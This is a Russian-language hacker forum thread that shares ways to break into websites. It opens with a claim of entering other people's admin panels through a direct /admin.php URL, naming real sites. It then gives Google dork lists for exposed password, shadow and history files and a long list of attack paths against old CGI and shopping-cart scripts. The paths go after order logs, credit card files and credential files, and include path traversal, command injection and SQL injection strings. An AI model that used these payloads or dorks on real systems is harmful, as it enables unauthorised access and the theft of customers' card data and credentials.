• XSS.stack #1 – первый литературный журнал от юзеров форума

Google hacking

Отслеживать
Civil-nix

Civil-nix

RAM
Пользователь
Регистрация
29.08.2005
Сообщения
103
Реакции
0
Даже незнаю бага это или так все и задумано! Но суть в том что однажды я попробовал получить доступ к админке не через логин пароль на главной странице, а так .ru/admin.php , после того как заругался мускуль админка все таки запустилась . Правда работало всего половина функций, нол мне и этого хватило!

Решив поискать такие админки я забил в гугле allinurl:/admin.php К моему удивлению, за полчаса я имел доступ к более 10-ти админок.

Пример http://akzia.com/images/admin.php?a=logo.php

А вот другой:http://soldaty.tv/admin.php

[mod][Winux:] Title corrected[/mod]
 
Civil-nix
Боян, старо имхо. Это наитупейший баг еловеества, когда надо знать лишь ссылку на админку.

Кста, перенесу тему в хакерство, так как в уязвимостях ей делать нечего - нет конкретной прогруммы, в которой есть этот баг)
 
Ну в таком случае добавлю запросов вколлекцию.
Итак, берем корзинку и идем за урожаем админок и прочих вкусностей, скрытых нерадивыми админами. Итак, гугл хакинг рулит, от большого брата ничего нее скроешь:

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
Добавлено в [time]1138685696[/time]
Ахха, вот еще списочек. Не моу, так что могут быть повторения:

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

/robots.txt
/admin.mdb
/shopping.mdb
/arg;
/stats/styles.css
/statshelp.htm
/favicon.ico
/stats/admin.mdb
/shopdbtest.asp
/cgi-bin/test.cgi
/cgi-bin/test.pl
/cgi-bin/env.cgi
/photos/protest/styles.css
http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
/cgi-bin/whereami.cgi
/shopping400.mdb
/cgi/test.cgi
/cgi-bin/test2.pl
/photos/protest/kingmarch_02.html
/chevy/index.htm
/cgi-bin/glocation.cgi
/cgi-bin/test2.cgi
/ccbill/glocation.cgi
/cgi-bin/styles.css
/shopping350.mdb
/cgi-bin/shopper.cgi
/shopadmin.asp
/news_2003-02-27.htm
/cgi-bin/whois.cgi
3 /cgi-bin/calendar.pl
3 /cgi-bin/calendar/calendar.pl
3 /cgibin/styles.css
3 /venem.htm
2 /stats/www.newbauersflowers.com/stats/04-refers.htm
2 /cgi-bin/where.pl
2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
2 /cgibin/recon.cgi
2 /cgibin/test.cgi
2 /WebShop/templates/styles.css
2 /stats/shopping350.mdb
2 /cgi-bin/mailform.cgi
2 /cgi-bin/recon.cgi
2 /chevy
2 /cgi-bin/servinfo.cgi
2 /acart2_0.mdb
2 /cgi-bin/where.cgi
2 /chevy/
2 /stats/www.savethemall.net/stats/19-refers.htm
2 /ccbill/secure/ccbill.log
2 /cgi/recon.cgi
2 /stats/www.gregoryflynn.com/chevy
2 /ibill/glocation.cgi
2 /ccbill/whereami.cgi
2 /ibill/whereami.cgi
2 /apps_trial.htm
2 /cgi-bin/lancelot/recon.cgi
2 /cgi-bin/DCShop/Orders/styles.css
1 /cgi-bin/htmanage.cgi
1 /stats/www.tysons.net/stats/05-refers.htm
1 /cgi-bin/mastergate/add.cgi
1 /cgi-bin/openjournal.cgi
1 /cgi-bin/calendar/calendar_admin.pl
1 /cgibin/ibill/count.cgi
1 /cgi-bin/nbmember2.cgi
1 /cgi-bin/mastergate/count.cgi
1 /cgi-bin/mastergate/accountcreate.cgi
1 /cgi-bin/ibill/accountcreate.cgi
1 /cgibin/MasterGate2/count.cgi
1 /cgi-bin/amadmin.pl
1 /cgibin/mailform.cgi
1 /cgibin/mastergate/count.cgi
1 /cgibin/harvestor.cgi
1 /cgibin/igate/count.cgi
1 /WebShop
1 /shopdisplaycategories.asp
1 /cgi-bin/DCShop/Orders/orders.txt
1 /cgi-bill/revshare/joinpage.cgi
1 /stats/www.gregoryflynn.com/stats/19-refers.htm
1 /cgi-local/DCShop/auth_data/styles.css
1 /cgi-bin/add-passwd.cgi
1 /cgi-bin/MasterGate/count.cgi
1 /apps_shop.htm%20/comersus/database/comersus.mdb
1 /data/verotellog.txt
1 /epwd/ws_ftp.log
1 /stats/www.dialacure.com/stats/16-refers.htm
1 /cgi/MasterGate2/count.cgi
1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
1 /wwii/styles.css
1 /cgi-bin/admin.mdb
1 /stats/www.gregoryflynn.com/stats/31-refers.htm
1 /cgi-bin/ibill-tools/count.cgi
1 /WebShop/templates/cc.txt
1 /cgibin/ibill/accountcreate.cgi
1 /cgi-bin/count.cgi
1 /cgi-local/DCShop/auth_data/auth_user_file.txt
1 /cgi/mastergate/count.cgi
1 /cgi-bin/EuroDebit/addusr.pl
1 /cgi-bin/dbm-passwd.cgi
1 /cgi/igate/accountcreate.cgi
1 /cgi-bin/store/Log_files/your_order.log
store/log_files/your_order.log
/cg i-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/ cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/---.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html
/or ders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/temp lates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/yo ur_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgi bin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin /html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin /cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/---.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win /DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/ shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/ cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin /Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin /store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/ page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin /pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin /admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin /admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/---.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/ cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/ authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/im port.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders. txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win /shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/ cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-loca l/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/ shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/sh op/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/sh op/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/l og_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CO DE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin /shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.c gi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/ metacart.mdb
/cgi-local/shop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/log/
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/scripts/c32web.exe
/cgis/ord ers/orders.txt
/logfile/
/shop_db/shopping.mdb
/shopping.mdb
/weblog/
/config/datasources/cvv2.mdb
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin /PDG_Cart/order.log
/cgi-sys/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgi-win/cart32.exe
/cgi-bin/loadpage.cgi
/dcshop/orders/orders.txt
/shop/show.php?q='
/cgib in/orders/orders.txt
/bin/pagelog.cgi
/cgi-bin/shop/orders/orders.txt
/_database/shopdbtest.asp
/cgibin /pagelog.cgi
/cgi-local/shop.pl/page=;cat%20shop.pl
/shop/search .php?q='
/cgi-sys/cart32.exe
/order13.txt
/weblogs/
/orderb/sh op.mdb
/config/datasources/order.mdb
/store/cgi-bin/Admin_files/Store_user_lib.pl
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/Orders /order.log
/logs/access_log
/config/datasources/your_order.mdb
/ecommerce/admin/admin/admin.asp
/mall_log_files/order.log
/bin/cart32.exe
/htbin/DCShop/orders/orders.txt
/Admin_files/Authorize_Net.pl
/logging/
/database/
/cgi-sys/shop/auth_data/auth_user_file.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi-local/shop/auth_data/auth_user_fil e.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-win /DCShop/orders/orders.txt
/store/Admin_files/Authorize_Net.pl
/cart/cart.asp
/bin/DCShop/orders/orders.txt
/scripts/pagelog.cgi
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb
/webcart/config/clients.txt
/dc/auth_data/auth_user_file.txt
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/bin /orders/orders.txt
/cgi-bin/Web_Store/web_store.cgi
/cgis/pagelog.cgi
/cgi-bin /orders/orders.txt
/merchant/shopdbtest.asp
/cgi-local/shop.pl/page=shop.cfg
/cgis/shop.pl/pa ge=;cat%20shop.pl
/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd
/cg-bin/
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin /DCShop/Auth_data/auth_user_file.txt
/ecommerce/admin/adminLeft/admin.asp
/webcart/orders/import.txt
/cgibin/shop/auth_data/auth_user_file.txt
/productcart/database/eipc.mdb
/mysql/cheersoundchdb.mdb
/cgi-bin/order.txt
/scripts/iisadmin/tools/mkilog.exe
/ProductCart/database/EIPC.mdb
/databases/
/cg i-sys/orders/orders.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/ database/EIPC.mdb
//cgi-bin/orders.txt
/vpasp-shopcart/shopdbtest.asp
/cgi-bin /shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/DCShop/orders/orders.txt
/mysql/shopping350.mdb
/_database/shopping.mdb
/htbin/cart32.exe
/PDG_Cart/shopper.config
/cgis/shop/auth_data/auth_user_file.txt
/shop/SHOPDBTEST.ASP
/bin/shop/orders/orders.txt
//cgi-local/medstore/loadpage.cgi?user_id=id &file=data/orders.txt
/cgi-bin/store/dcshop_admin.cgi
/_database/shopping400.mdb
/scripts/shop.pl/page=;cat%20shop.pl
/cgibin/PDG_Cart/shopper.conf
/cgibin/DCShop/orders/orders.txt
/cgibin/%20awstats.pl?output=keywords
/cgi/shop/orders/orders.txt
/cgi-bin /cart32_old.exe
/webshop/templates/cc.txt
/webcart/orders
/pro ductcart/database/shop.mdb
/index.php?link=order
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/shopping/shopdisplayproducts.asp?
/ccbill-local.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /c32web.exe/CheckError?error=53
/server/admin_files/commerce_user_lib.pl
/shopping/shopdisplayproducts.asp?id=1&cat=order.log
/mail.cgi
/cgibin/admin_files/
/cgi-bin/mail/form.cgi
/cgibin/shopping/database/metacart.mdb
/globill/ver12otellog.txt
/cgi-bin/shopping.mdb
/shopping%20.mdb
/cgi-bin/mail.cgi
/cgi-bin/FORM.cgi
/cgibin/shop/database/metacart.mdb
/mail/form.cgi
/cgibin /shop/shopping350.mdb
/form.cgi
/shopping/cgi-bin/cart32.ini
/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/c32web.exe/ShowProgress
/vpasp/shopdisplayproducts.asp?cat=qwerty'% 20union%20select%20fldauto
/cgibin/orders.txt
/cgibin/scripts/shop/shopping350.mdb
/form/mail.cgi
/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd
/webshop/logs/cc.txt
/form/form.cgi
/store/index.cgi?page=../../../../../../../../etc/passwd
/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail
/cgibin/%20awstats.pl?
/cgi-bin/Form.cgi
/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25
/admin.mdb
/cgi-bin/cart32.exe/error
/cgi/mail.cgi
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/csql/index.cgi?page=../admin/files/order.log
/cgi-bin/admin_files/
/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd
/admins.asp
/cgi-bin/cart_top
/cgi-bin/mail/mail.cgi
/shopadmin.asp
/cgi-bin/order.log
/mailform.pl
/cgibin/admin.pl
/vpasp/shopdisplayproducts.asp?
/policies1.htm
/cgi-bin/c32web_old.exe
/cgi-bin /c32web.exe
/cgi-bin/form/form.cgi
/cgibin/metacart.mdb
/shopdisplayproducts.asp
/cgi-sys/DCShop/orders/orde rs.txt
/ccbill6/secure/
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124 &STRMVER=4&CAPREQ=0
/cgi-bin/ibill.log
/ccbill6/
/password.txt
/cgi-bin /PDG_cart/card
/cgibin/www.google.com
/honeymoonSPOILERaway.htm+honeymoon+charleston
/cgibin/awstats.pl%3Flang%3Dnl
/cgibin/admin.pl?setpasswd
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/%20awstats.pl?output=keywords
/shop/shopping450.mdb
/ccbill6/secure/ccbill.log
/cgibin/awstats.pl%3Flang%3Des%26update%3D1
/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf
/cgi-bin/form.cgi
/M83A
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awstats.pl%3Flang%3Dit
/orderdb/database/eipc.mdb
/cg-bin//eshop/database/order.mdb
/store/database/comersus.mdb
/cgibin /password.mdb
/~admin/guestbook
/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords
/cgibin /awstats.pl%3Foutput%3Durldetail%26lang%3Dnl
/cgibin/%20awstats.pl?output=keywords
/sumthin
/cgibin/cgibin/%20awstats.pl?output=keywords
/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/productcart/database/eipc.mdb
/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde
/mail/mail.cgi
/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl
/cg/.%20/comersus/database/comersus.mdb
/index%20of%20/%20productcart/database/eipc.mdb
/scripts/nsiislog.dll
/cgibin/order.cgi
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/cgi-bin /awstats.pl%3Flang%3Dde
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgibinserver/admin_files/commerce_user_lib.pl
/cgibin/store/Admin_files/myorderlog.txt
//cgibin/orders.txt
/cgibin/database/shopping.mdb
/cgibin/shopping/shopadmin.asp
/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgibin/allmanageup.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/eshop/database/log.mdb
/cgibin /awsta
/cgibin/nph-proxy.pl
/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1
//config/---.mdb
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des
/cgibin/ccbill/password/.htpasswd
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases
/eshop/en/database/credit.mdb
/cgi-bin /pdg_cart/shopper.conf
/password.mdb
/data/verotellog.txt
/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1
/productcart/eipc.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit
/index%20of%20/webshop/templates/cc.txt
/cartdb/database/eipc.mdb
/cg i-bin/eshop/database/order.mdb
/cgibin//fpdb/shopping400.mdb
/cgibin/order.txt
/cgi-bin/cart32.exe/expdate%20algunas%20veces
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords
/cgibin/database/comersus.mdb
/cgi-bin/awstats.pl%3Flang%3Des
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr
/globill/
/cgibin/fpdb/shopping400.mdb
/cgibin/perl.exe
/eshop/en/database/log.mdb
/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log
/cg/comersus/database/comersus. mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail
/cgibin/admin.mdb
/cgi-bin/whereami.cgi?g=ls
/cgibin/xxxhu
cgibin/cartserver/admin_files/commerce_user_lib.pl
/cgibin/%20awstats.pl?output=keywords
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr
/robot.txt
/cgi-bin/form/mail.cgi
/ibill/mypins/
/cgi-bin/awstats.pl%3Flang%3Dnl
/cgibin/allmanage_admin.pl
/cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords
/cg-ibin /admin_files/
/cgibin/cart/comersus.mdb
/cg-bin/eshop/database/order.mdb
/cgibin /htt
/cgibin/phf
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den
/database/eipc.mdb
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STR MVER=4&CAPREQ=0
/script/shop/shopping350.mdb
/cgibin/shopping350.mdb
/cg-bin/eshop/en/database/credit.mdb
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den
/cgi-bin/add-passwd.cgi
/logs/200306/charleston.com/
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/cgibin/store/log_files/your_order.log
/cgibin /shopper.exe?search=action&keywords=psiber&template=neworder.log
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/awstats.pl%3Flang%3Dfr%26update%3D1
/cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1
/cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl
/cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail
/cgibin/mailform.pl
/cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords
/cgi-bin/shop/shopping350.mdb
/cgibin/cart/database/comersus.mdb
/dbase/date.
/www.gambling-01.co.uk/cgibin/password.txt
/cgibin/awstats.pl%3Flang%3Des
/ccbill/ccbill.log
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde
/productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Sub mit.y=5&Submit=Submit
/cgibin/index%20of
/cgi-bin/form1.cgi
/cc.txt
/cgibin/awstats.pl%3Flang%3Den%26update%3D1
/cg/./comersus/database/comersus.mdb
/cgi-bin/awstats.pl%3Foutput%3Dkeyphrases
/cgibin /webshop/templates/cc.txt
/....../ all
/....../config.sys
/....../etc/hosts
/../../../../ all
/../../../../../../../boot.ini
/../../../../../winnt/repair/sam._
/../../../../config.sys
/../../../../etc/hosts
/.access
/.bash_history
/.htacc ess
/.html/............./config.sys
/.htpasswd
/.passwd
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/AdvWorks/equipment/catalog_type.asp
/Orders/order.log
/PDG_Cart/order.log
/PDG_Ca rt/shopper.conf
/PSUser/PSCOErrPage.htm
/WebShop/logs/cc.txt
/WebShop/logs/ck. log
